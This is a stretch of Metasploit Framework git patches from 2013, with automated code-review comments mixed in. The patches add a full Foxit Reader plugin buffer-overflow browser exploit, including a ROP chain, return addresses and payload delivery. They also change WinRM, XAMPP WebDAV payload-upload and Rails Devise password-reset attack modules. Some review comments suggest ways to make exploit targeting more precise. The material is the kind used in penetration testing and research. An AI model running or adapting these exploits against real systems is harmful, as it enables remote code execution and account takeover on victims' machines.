@@ -215,8 +221,8 @@ def exploit :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['USERNAME'], - :pass => datastore['PASSWORD'], + :user => datastore['BasicAuthUser'], + :pass => datastore['BasicAuthPass'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 3bfd6c668e18..9865c8716bd4 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -67,6 +67,9 @@ def initialize(info = {}) end def go(command) + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + xml = <<-EOS <?xml version="1.0"?> <methodCall> diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index c337ecdeee63..3484cdf86f47 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -72,8 +72,8 @@ def initialize(info = {}) register_options( [ Opt::RPORT(8080), - OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), - OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), ], self.class) end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index c4d36a61f1fc..c19096b2c8e9 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb 
@@ -36,8 +36,8 @@ def initialize [ OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), - OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) + OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), + OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) ], self.class) end @@ -46,10 +46,12 @@ def initialize def exploit uri = build_path print_status "Uploading Payload to #{uri}" - res = send_request_cgi({ + res,c = send_digest_request_cgi({ 'uri' => uri, 'method' => 'PUT', - 'data' => payload.raw + 'data' => payload.raw, + 'DigestAuthUser' => datastore['RUSER'], + 'DigestAuthPassword' => datastore['RPASS'] }, 25) unless (res and res.code == 201) print_error "Failed to upload file!" diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 62e343a79896..666ca66d3dba 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -66,8 +66,20 @@ def initialize(info = {}) @compat_mode = false end - def exploit + def check + unless accepts_ntlm_auth + print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth" + return Msf::Exploit::CheckCode::Safe + end + + return Msf::Exploit::CheckCode::Vulnerable + end + + def exploit + unless check == Msf::Exploit::CheckCode::Vulnerable + return + end unless valid_login? print_error "Login Failure. Recheck your credentials" return 
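Review bot: The new `check` in winrm_script_exec.rb returns `Msf::Exploit::CheckCode::Vulnerable` whenever `accepts_ntlm_auth` is true, but that test only shows the service offers Negotiate authentication; no credential or weakness has been verified at that point. Anyone consuming check results for reporting would see every NTLM-enabled WinRM endpoint flagged as vulnerable. Return `Msf::Exploit::CheckCode::Detected` instead, and gate `exploit` with `return unless accepts_ntlm_auth` rather than comparing against the check code.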
@@ -129,7 +141,7 @@ def encoded_psh(script) def temp_dir print_status "Grabbing %TEMP%" - resp = send_winrm_request(winrm_open_shell_msg) + resp,c = send_request_ntlm(winrm_open_shell_msg) if resp.nil? print_error "Got no reply from the server" return nil @@ -140,16 +152,16 @@ def temp_dir end shell_id = winrm_get_shell_id(resp) cmd = "echo %TEMP%" - resp= send_winrm_request(winrm_cmd_msg(cmd, shell_id)) + resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) cmd_id = winrm_get_cmd_id(resp) - resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id)) + resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) streams = winrm_get_cmd_streams(resp) return streams['stdout'].chomp end def check_remote_arch wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} - resp = send_winrm_request(winrm_wql_msg(wql)) + resp,c = send_request_ntlm(winrm_wql_msg(wql)) #Default to x86 if we can't be sure return "x86" if resp.nil? or resp.code != 200 resp_tbl = parse_wql_response(resp) @@ -235,7 +247,7 @@ def powershell2? def valid_login? data = winrm_wql_msg("Select Name,Status from Win32_Service") - resp = send_winrm_request(data) + resp,c = send_request_ntlm(data) unless resp.code == 200 return false end From 71abcdbd1a10ed6d5c426e1baed68c1b181bfb0e Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Mon, 11 Feb 2013 21:56:56 -0600 Subject: [PATCH 365/421] Update Gemfile.lock --- Gemfile.lock | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/Gemfile.lock b/Gemfile.lock index 99f60b664ded..c50df873bfab 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,8 +28,12 @@ GEM coderay (1.0.8) diff-lcs (1.1.3) i18n (0.6.1) + json (1.7.7) method_source (0.8.1) + msgpack (0.5.2) multi_json (1.0.4) + nokogiri (1.5.6) + pcaprub (0.11.3) pg (0.14.1) pry (0.9.10) coderay (~> 1.0.5) 
@@ -37,6 +41,7 @@ GEM slop (~> 3.3.1) rake (10.0.2) redcarpet (2.2.2) + robots (0.10.1) rspec (2.12.0) rspec-core (~> 2.12.0) rspec-expectations (~> 2.12.0) @@ -57,10 +62,17 @@ PLATFORMS ruby DEPENDENCIES + activerecord activesupport (>= 3.0.0) + json metasploit_data_models! + msgpack + nokogiri + pcaprub + pg (>= 0.11) rake redcarpet + robots rspec (>= 2.12) simplecov (= 0.5.4) yard From 69267b82b09204afe3dbbb687b59f5c72402ac6c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 18:44:19 +0100 Subject: [PATCH 366/421] Make stable #1318 foxit reader exploit --- .../browser/foxit_reader_plugin_url_bof.rb | 187 ++++++++++++++++++ 1 file changed, 187 insertions(+) create mode 100644 modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb new file mode 100644 index 000000000000..b410c2695adb --- /dev/null +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb 
@@ -0,0 +1,187 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpServer::HTML + + Rank = NormalRanking + + def initialize(info={}) + super(update_info(info, + 'Name' => "Foxit Reader Plugin URL Processing Buffer Overflow", + 'Description' => %q{ + This module exploits a vulnerability in the Foxit Reader Plugin, it exists in + the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, + overly long query strings within URLs can cause a stack-based buffer overflow, + which can be exploited to execute arbitrary code. This exploit has been tested + on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.1128 + (npFoxitReaderPlugin.dll version 2.2.1.530). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod <rgod[at]autistici.org>', # initial discovery and poc + 'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module + 'juan vazquez', # metasploit module + ], + 'References' => + [ + [ 'OSVDB', '89030' ], + [ 'BID', '57174' ], + [ 'EDB', '23944' ], + [ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ], + [ 'URL', 'http://secunia.com/advisories/51733/' ] + ], + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true + }, + 'DefaultOptions' => + { + 'EXITFUNC' => "process", + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # npFoxitReaderPlugin.dll version 2.2.1.530 + [ 'Automatic', {} ], + [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44', + { + 'Offset' => 272, + 'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin + 'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin + :rop => :win7_rop_chain + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 7 2013", + 'DefaultTarget' => 0)) + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + #Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0 + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || '' + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + if os_name == 'Windows 7' and firefox =~ /18/ + return targets[1] + end + + return nil + end + + # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) + def win7_rop_chain + + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] + 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] + 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] + 0x10021081, # 
PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] + 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] + 0x41414141, # Filler (RETN offset compensation) + 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] + 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] + 0x00001000, # 0x00001000-> edx + 0x1000d9ec, # XOR EDX, EDX # RETN + 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] + 0x41414141, # Filler (compensate) + 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] + 0x41414141, # Filler (RETN offset compensation) + 0x41414141, # Filler (RETN offset compensation) + 0x41414141, # Filler (RETN offset compensation) + 0x41414141, # Filler (RETN offset compensation) + 0x00000040, # 0x00000040-> ecx + 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] + 0x00000001, # 0x00000001-> ebx + 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] + 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll] + 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] + 0x90909090, # nop + 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] + ].flatten.pack("V*") + + return rop_gadgets + end + + def on_request_uri(cli, request) + + agent = request.headers['User-Agent'] + my_target = get_target(agent) + + # Avoid the attack if no suitable target found + if my_target.nil? 
+ print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + unless self.respond_to?(my_target[:rop]) + print_error("Invalid target specified: no callback function defined") + send_not_found(cli) + return + end + + return if ((p = regenerate_payload(cli)) == nil) + + # we use two responses: + # one for an HTTP 301 redirect and sending the payload + # and one for sending the HTTP 200 OK with appropriate Content-Type + if request.resource =~ /\.pdf$/ + # sending Content-Type + resp = create_response(200, "OK") + resp.body = "" + resp['Content-Type'] = 'application/pdf' + resp['Content-Length'] = rand_text_numeric(3,"0") + cli.send_response(resp) + return + else + resp = create_response(301, "Moved Permanently") + resp.body = "" + + my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] + if datastore['SSL'] + schema = "https" + else + schema = "http" + end + + sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length) + sploit << [my_target.ret].pack("V") # EIP + sploit << [my_target['WritableAddress']].pack("V") # Writable Address + sploit << self.send(my_target[:rop]) + sploit << p.encoded + + resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all') + cli.send_response(resp) + + # handle the payload + handler(cli) + end + end + +end From 96b1cb3cfbb35e185ce8d6e8f59fb4ecfe3b50ff Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 18:50:36 +0100 Subject: [PATCH 367/421] fix version info --- .../exploits/windows/browser/foxit_reader_plugin_url_bof.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index b410c2695adb..6c59092789aa 100644 
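Review bot: In `get_target`, `firefox =~ /18/` is unanchored, so any version string that merely contains "18" selects the Firefox 18 target, which is wider than the single configuration the description says was tested. Comparing the major version exactly, e.g. `firefox.split('.').first == '18'`, keeps automatic selection to the tested browser and lets everything else fall through to the existing 404 path. The comment at the top of the method reads "If the user is already specified by the user"; it should be `# If the target is already specified by the user, just use that`.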
--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -21,7 +21,7 @@ def initialize(info={}) the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested - on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.1128 + on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530). }, 'License' => MSF_LICENSE, @@ -54,7 +54,7 @@ def initialize(info={}) [ # npFoxitReaderPlugin.dll version 2.2.1.530 [ 'Automatic', {} ], - [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44', + [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44.11281', { 'Offset' => 272, 'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin From f58cc6a2e083a11dc48b7256d6e352f93186a73a Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Tue, 12 Feb 2013 18:51:04 +0100 Subject: [PATCH 368/421] more fix version info --- modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 6c59092789aa..7e5d6353a3b9 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -54,7 +54,7 @@ def initialize(info={}) [ # npFoxitReaderPlugin.dll version 2.2.1.530 [ 'Automatic', {} ], - [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44.11281', + [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281', { 'Offset' => 272, 'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin From 9e1f106a876e2eb604aa254667cef0a48d37cd24 Mon Sep 17 00:00:00 2001 
From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 13:38:58 -0600 Subject: [PATCH 369/421] msftidy cleanup --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 6445c286be72..6ea0d62e8060 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -142,7 +142,7 @@ def run if status == false print_error("Failed") return - end + end print_good("Success") # Reset a password. We're racing users creating other reset tokens. From c7719bf4cb1a6d6ae6ccc10d8d5a9a003c14d818 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 13:41:21 -0600 Subject: [PATCH 370/421] Verify response is non-nil. --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 6ea0d62e8060..c3c8038e562e 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -68,6 +68,11 @@ def generate_token(account) 'data' => postdata, }) + unless (res) + print_error("No response from server") + return false + end + if res.code == 200 error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] print_error("Server returned an error:") @@ -107,6 +112,10 @@ def reset_one(password, report=false) 'ctype' => 'application/xml', 'data' => xml, }) + unless (res) + print_error("No response from server") + return false + end case res.code when 200 From 9efd3f6c5ecc3de77e7d6a68af9491b9320f05a5 Mon Sep 17 00:00:00 2001 
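Review bot: In `reset_one`, returning `false` when `res` is nil reuses the value that callers read as "no reset token left": `clear_tokens` loops `until (status == false)` and then reports a count of cleared tokens, so a dropped connection is reported as a completed flush. A distinct signal would keep the two outcomes apart, for example raising on no response and rescuing once in `run`, so that network failure is not mistaken for an empty token set. `unless (res)` can also drop the parentheses. `reset_one` begins and ends outside this hunk.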
From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 12 Feb 2013 21:47:12 +0200 Subject: [PATCH 371/421] scanner/http/crawler: added ExcludePathPatterns opt Option 'ExcludePathPatterns' allows users to specify which paths should be excluded from the crawl (and which forms to ignore) by passing a list of patterns (only allows '*' wildcards). --- modules/auxiliary/scanner/http/crawler.rb | 67 ++++++++++++++++------- 1 file changed, 47 insertions(+), 20 deletions(-) diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 6d50554d9873..8488c24dd0e7 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -21,6 +21,9 @@ def initialize 'License' => MSF_LICENSE ) + register_advanced_options([ + OptString.new('ExcludePathPatterns', [false, 'Newline-separated list of path patterns to ignore (\'*\' is a wildcard)']), + ]) @for_each_page_blocks = [] end @@ -31,6 +34,17 @@ def focus_crawl(page) end =end + # Overrides Msf::Auxiliary::HttpCrawler#get_link_filter to add + # datastore['ExcludePathPatterns'] + def get_link_filter + return super if datastore['ExcludePathPatterns'].to_s.empty? + + patterns = opt_patterns_to_regexps( datastore['ExcludePathPatterns'].to_s ) + patterns = patterns.map { |r| "(#{r.source})" } + + Regexp.new( [["(#{super.source})"] | patterns].join( '|' ) ) + end + def run super 
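Review bot: `get_link_filter` rebuilds the combined filter from `super.source` and `r.source`, and `Regexp#source` drops a pattern's options, so if the inherited filter is case-insensitive (not visible here) the override silently makes it case-sensitive as soon as `ExcludePathPatterns` is set. `Regexp.union(super, *opt_patterns_to_regexps(datastore['ExcludePathPatterns'].to_s))` keeps each pattern's own flags and removes the manual grouping and `join`. A one-line comment stating that a match means "skip this link" would also help, since the method name does not say which way the filter works.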
@@ -163,31 +177,34 @@ def crawler_process_page(t, page, cnt) end end - form = {}.merge!(form_template) - form[:method] = (f['method'] || 'GET').upcase - form[:query] = target.query.to_s if form[:method] != "GET" - form[:path] = target.path - form[:params] = [] - f.css('input', 'textarea').each do |inp| - form[:params] << [inp['name'].to_s, inp['value'] || inp.content || '', { :type => inp['type'].to_s }] - end + # skip this form if it matches exclusion criteria + if !(target.to_s =~ get_link_filter) + form = {}.merge!(form_template) + form[:method] = (f['method'] || 'GET').upcase + form[:query] = target.query.to_s if form[:method] != "GET" + form[:path] = target.path + form[:params] = [] + f.css('input', 'textarea').each do |inp| + form[:params] << [inp['name'].to_s, inp['value'] || inp.content || '', { :type => inp['type'].to_s }] + end - f.css( 'select' ).each do |s| - value = nil + f.css( 'select' ).each do |s| + value = nil - # iterate over each option to find the default value (if there is a selected one) - s.children.each do |opt| - ov = opt['value'] || opt.content - value = ov if opt['selected'] - end + # iterate over each option to find the default value (if there is a selected one) + s.children.each do |opt| + ov = opt['value'] || opt.content + value = ov if opt['selected'] + end - # set the first one as the default value if we don't already have one - value ||= s.children.first['value'] || s.children.first.content rescue '' + # set the first one as the default value if we don't already have one + value ||= s.children.first['value'] || s.children.first.content rescue '' - form[:params] << [ s['name'].to_s, value.to_s, [ :type => 'select'] ] - end + form[:params] << [ s['name'].to_s, value.to_s, [ :type => 'select'] ] + end - forms << form + forms << form + end end end 
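Review bot: The exclusion test matches `target.to_s`, which is the whole URL (the same object supplies `target.path` and `target.query` below), against patterns that `opt_patterns_to_regexps` anchors with `^` and `$`, so a path pattern such as `/admin/*` (constructed example) cannot match and the form is still collected. Testing the path, `unless target.path =~ get_link_filter`, lines the check up with the option's "path patterns" wording; how the base crawler applies the same filter to links is not visible here and should be checked for the same mismatch. `get_link_filter` is also recompiled for every form, so assigning it to a local before the loop would avoid repeated work. The enclosing loop starts outside this hunk.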
@@ -252,4 +269,14 @@ def form_from_url( website, url ) form[:method] ? form : nil end + private + def opt_patterns_to_regexps( patterns ) + magic_wildcard_replacement = Rex::Text.rand_text_alphanumeric( 10 ) + patterns.to_s.split( /[\r\n]+/).map do |p| + Regexp.new '^' + Regexp.escape( p.gsub( '*', magic_wildcard_replacement ) ). + gsub( magic_wildcard_replacement, '.*' ) + '$' + end + end + + end From c6a7a4e68dfda54428b663990944e13caeef1e67 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 14:50:10 -0600 Subject: [PATCH 372/421] /URIPATH/TARGETURI/g --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index c3c8038e562e..499b971bdd9b 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -47,7 +47,7 @@ def initialize(info = {}) register_options( [ - OptString.new('URIPATH', [ true, "The request URI", '/users/password']), + OptString.new('TARGETURI', [ true, "The request URI", '/users/password']), OptString.new('TARGETEMAIL', [true, "The email address of target account"]), OptString.new('PASSWORD', [true, 'The password to set']), OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), @@ -63,7 +63,7 @@ def generate_token(account) postdata="user[email]=#{account}" res = send_request_cgi({ - 'uri' => datastore['URIPATH'], + 'uri' => datastore['TARGETURI'], 'method' => 'POST', 'data' => postdata, }) @@ -107,7 +107,7 @@ def reset_one(password, report=false) xml << "</user>" res = send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", + 'uri' => datastore['TARGETURI'] || "/", 'method' => 'PUT', 'ctype' => 'application/xml', 'data' => xml, From 1d5d33f306cc5baa02ec03b769aa29f84a6237e5 Mon Sep 17 00:00:00 2001 
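Review bot: `opt_patterns_to_regexps` anchors each pattern with `'^'` and `'$'`, which in Ruby match at line boundaries rather than at the ends of the string; `\A` and `\z` express "the whole value" exactly and are the safer habit for any allow/deny filter. The random-placeholder round trip is unnecessary, because `Regexp.escape` already turns `*` into `\*`: `Regexp.new('\A' + Regexp.escape(p).gsub('\*', '.*') + '\z')` gives the same pattern without it. Entries are not stripped, so leading or trailing spaces in a line become part of the pattern, and a leading newline in the option yields an empty pattern; `map(&:strip).reject(&:empty?)` before compiling would cover both.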
From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 14:58:07 -0600 Subject: [PATCH 373/421] use normalize_uri() --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 499b971bdd9b..4f577afadd95 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -63,7 +63,7 @@ def generate_token(account) postdata="user[email]=#{account}" res = send_request_cgi({ - 'uri' => datastore['TARGETURI'], + 'uri' => normalize_uri(datastore['TARGETURI']), 'method' => 'POST', 'data' => postdata, }) @@ -107,7 +107,7 @@ def reset_one(password, report=false) xml << "</user>" res = send_request_cgi({ - 'uri' => datastore['TARGETURI'] || "/", + 'uri' => normalize_uri(datastore['TARGETURI']), 'method' => 'PUT', 'ctype' => 'application/xml', 'data' => xml, From 846052a34dfff3b966a76b6039cddcaaf3367407 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 12 Feb 2013 15:13:06 -0600 Subject: [PATCH 374/421] s/URIPATH/TARGETURI/g per @jvasquez-r7 comments on another pull. --- modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index 64c67cf86b25..66ebde956d1d 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb 
@@ -31,14 +31,14 @@ def initialize(info={}) )) register_options([ - OptString.new('URIPATH', [true, "The URI to test", "/"]), + OptString.new('TARGETURI', [true, "The URI to test", "/"]), OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT']]), ], self.class) end def send_probe(pdata) res = send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", + 'uri' => datastore['TARGETURI'], 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/json', 'data' => pdata @@ -59,7 +59,7 @@ def run_host(ip) if res1.code.to_s =~ /^[5]/ print_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request") - print_error("\t\tDouble check URIPATH and HTTP_METHOD") + print_error("\t\tDouble check TARGETURI and HTTP_METHOD") return end @@ -94,7 +94,7 @@ def run_host(ip) }) else # Otherwise we're not likely vulnerable. - vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH must be set") + vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or TARGETURI must be set") end end From 167f5970c15009ce637d39cee03c737c042a9c7c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 13 Feb 2013 00:07:58 +0100 Subject: [PATCH 375/421] minor cleanup for rails_json_yaml_scanner --- .../scanner/http/rails_json_yaml_scanner.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index 66ebde956d1d..514559eb1f08 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb 
@@ -19,14 +19,15 @@ def initialize(info={}) This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the JSON request processor. }, - 'Author' => [ + 'Author' => + [ 'jjarmoc', # scanner module 'hdm' # CVE-2013-0156 scanner, basis of this technique. - ], + ], 'License' => MSF_LICENSE, 'References' => [ - ['CVE', '2013-0333'], + ['CVE', '2013-0333'] ] )) @@ -38,11 +39,11 @@ def initialize(info={}) def send_probe(pdata) res = send_request_cgi({ - 'uri' => datastore['TARGETURI'], + 'uri' => normalize_uri(datastore['TARGETURI']), 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/json', 'data' => pdata - }, 25) + }) end def run_host(ip) @@ -58,8 +59,7 @@ def run_host(ip) end if res1.code.to_s =~ /^[5]/ - print_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request") - print_error("\t\tDouble check TARGETURI and HTTP_METHOD") + vprint_error("#{rhost}:#{rport} The server replied with #{res1.code} for our initial JSON request, double check TARGETURI and HTTP_METHOD") return end @@ -94,7 +94,7 @@ def run_host(ip) }) else # Otherwise we're not likely vulnerable. - vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or TARGETURI must be set") + vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or TARGETURI & HTTP_METHOD must be set") end end From 799beb5adcc958dde98974a50519b7085cb65fa5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 13 Feb 2013 01:00:25 +0100 Subject: [PATCH 376/421] minor cleanup --- .../admin/http/rails_devise_pass_reset.rb | 56 +++++++++---------- 1 file changed, 28 insertions(+), 28 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 4f577afadd95..af7a02dd0207 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb 
